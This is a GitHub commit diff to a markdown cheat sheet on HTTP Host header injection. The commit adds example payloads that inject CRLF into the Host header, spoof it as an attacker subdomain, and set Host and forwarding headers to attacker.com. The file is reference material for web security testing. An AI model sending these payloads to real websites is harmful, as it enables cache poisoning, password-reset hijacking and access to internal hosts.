Update Host Header Injection.md

This commit is contained in:
Mehdi 2024-09-30 10:46:08 +03:30 committed by GitHub
parent 573ea30c12
commit 2d16f74307
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -9,13 +9,25 @@ HTTP Host header attacks exploit vulnerable websites that handle the value of th
* Allow access to virtual hosts that were not intended to be externally accessible. * Allow access to virtual hosts that were not intended to be externally accessible.
## How to exploit ## How to exploit
* Change the host header * Send a request with a malicious Host header value
```html
GET /index.html HTTP/1.1
Host: www.example.com%0d%0aX-Forwarded-For: 192.168.1.1
...
```
* Send a request with a spoofed Host header value
```html
GET /index.html HTTP/1.1
Host: www.example.com.attacker.com
...
```
* Change the Host header
```html ```html
GET /example HTTP/1.1 GET /example HTTP/1.1
Host: attacker.com Host: attacker.com
... ...
``` ```
* Duplicating the host header * Duplicating the Host header
```html ```html
GET /example HTTP/1.1 GET /example HTTP/1.1
Host: vulnerable-website.com Host: vulnerable-website.com
@ -39,7 +51,7 @@ X-Remote-Addr: attacker.com
X-Host: attacker.com X-Host: attacker.com
Forwarded: attacker.com Forwarded: attacker.com
# How to use? In this case im using "X-Forwarded-For : attacker.com" # How to use? In this case I using "X-Forwarded-For : attacker.com"
GET /example HTTP/1.1 GET /example HTTP/1.1
Host: vulnerable-website.com Host: vulnerable-website.com
X-Forwarded-For : attacker.com X-Forwarded-For : attacker.com
@ -50,9 +62,3 @@ GET https://vulnerable-website.com/ HTTP/1.1
Host: attacker.com Host: attacker.com
... ...
``` ```